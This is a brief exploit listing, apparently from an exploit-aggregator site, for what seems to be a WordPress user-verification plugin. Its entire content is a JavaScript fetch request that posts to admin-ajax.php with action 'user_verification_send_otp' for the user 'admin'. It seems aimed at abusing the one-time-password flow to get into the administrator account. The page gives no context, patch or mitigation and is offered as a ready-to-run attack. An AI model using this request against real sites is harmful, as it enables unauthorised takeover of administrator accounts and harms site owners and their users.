Share
## https://sploitus.com/exploit?id=WPEX-ID:1EEE10A8-135F-4B76-8289-C381FF1F51EA
Exploit:

fetch('http://localhost:10008/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=user_verification_send_otp&user_login=admin'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));